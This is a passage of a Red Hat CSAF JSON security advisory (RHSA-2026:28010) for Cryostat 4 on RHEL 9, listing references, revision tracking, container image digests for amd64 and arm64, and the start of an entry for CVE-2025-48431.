"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477224"
},
{
"category": "external",
"summary": "2477226",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477226"
},
{
"category": "external",
"summary": "2477232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477232"
},
{
"category": "external",
"summary": "2480741",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480741"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_28010.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Cryostat security update",
"tracking": {
"current_release_date": "2026-07-03T12:03:03+00:00",
"generator": {
"date": "2026-07-03T12:03:03+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.1"
}
},
"id": "RHSA-2026:28010",
"initial_release_date": "2026-06-22T17:15:26+00:00",
"revision_history": [
{
"date": "2026-06-22T17:15:26+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-22T17:15:26+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-03T12:03:03+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Cryostat 4 on RHEL 9",
"product": {
"name": "Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:cryostat:4::el9"
}
}
}
],
"category": "product_family",
"name": "Cryostat"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"product": {
"name": "cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"product_id": "cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-agent-init-rhel9\u0026tag=0.7.0-8"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"product": {
"name": "cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"product_id": "cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-db-rhel9\u0026tag=4.2.0-16"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"product": {
"name": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"product_id": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-grafana-dashboard-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"product": {
"name": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"product_id": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-openshift-console-plugin-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"product": {
"name": "cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"product_id": "cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-reports-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"product": {
"name": "cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"product_id": "cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"product": {
"name": "cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"product_id": "cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-operator-bundle\u0026tag=4.2.0-8"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"product": {
"name": "cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"product_id": "cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-rhel9-operator\u0026tag=4.2.0-15"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"product": {
"name": "cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"product_id": "cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/cryostat-storage-rhel9\u0026tag=4.2.0-16"
}
}
},
{
"category": "product_version",
"name": "cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"product": {
"name": "cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"product_id": "cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f?arch=amd64\u0026repository_url=registry.redhat.io/cryostat/jfr-datasource-rhel9\u0026tag=4.2.0-10"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"product": {
"name": "cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"product_id": "cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-agent-init-rhel9\u0026tag=0.7.0-8"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"product": {
"name": "cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"product_id": "cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-db-rhel9\u0026tag=4.2.0-16"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"product": {
"name": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"product_id": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-grafana-dashboard-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"product": {
"name": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"product_id": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-openshift-console-plugin-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"product": {
"name": "cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"product_id": "cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-reports-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"product": {
"name": "cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"product_id": "cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-rhel9\u0026tag=4.2.0-10"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"product": {
"name": "cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"product_id": "cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-operator-bundle\u0026tag=4.2.0-8"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"product": {
"name": "cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"product_id": "cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-rhel9-operator\u0026tag=4.2.0-15"
}
}
},
{
"category": "product_version",
"name": "cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"product": {
"name": "cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"product_id": "cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/cryostat-storage-rhel9\u0026tag=4.2.0-16"
}
}
},
{
"category": "product_version",
"name": "cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64",
"product": {
"name": "cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64",
"product_id": "cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2?arch=arm64\u0026repository_url=registry.redhat.io/cryostat/jfr-datasource-rhel9\u0026tag=4.2.0-10"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64"
},
"product_reference": "cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64"
},
"product_reference": "cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64"
},
"product_reference": "cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64"
},
"product_reference": "cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64"
},
"product_reference": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64"
},
"product_reference": "cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64"
},
"product_reference": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64"
},
"product_reference": "cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64"
},
"product_reference": "cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64"
},
"product_reference": "cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64"
},
"product_reference": "cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64"
},
"product_reference": "cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64"
},
"product_reference": "cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64"
},
"product_reference": "cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64"
},
"product_reference": "cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64"
},
"product_reference": "cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64"
},
"product_reference": "cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
},
"product_reference": "cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64"
},
"product_reference": "cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"relates_to_product_reference": "9Base-Cryostat-4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 as a component of Cryostat 4 on RHEL 9",
"product_id": "9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
},
"product_reference": "cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64",
"relates_to_product_reference": "9Base-Cryostat-4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-48431",
"cwe": {
"id": "CWE-763",
"name": "Release of Invalid Pointer or Reference"
},
"discovery_date": "2026-04-28T10:01:26.612789+00:00",
"flags": [
{
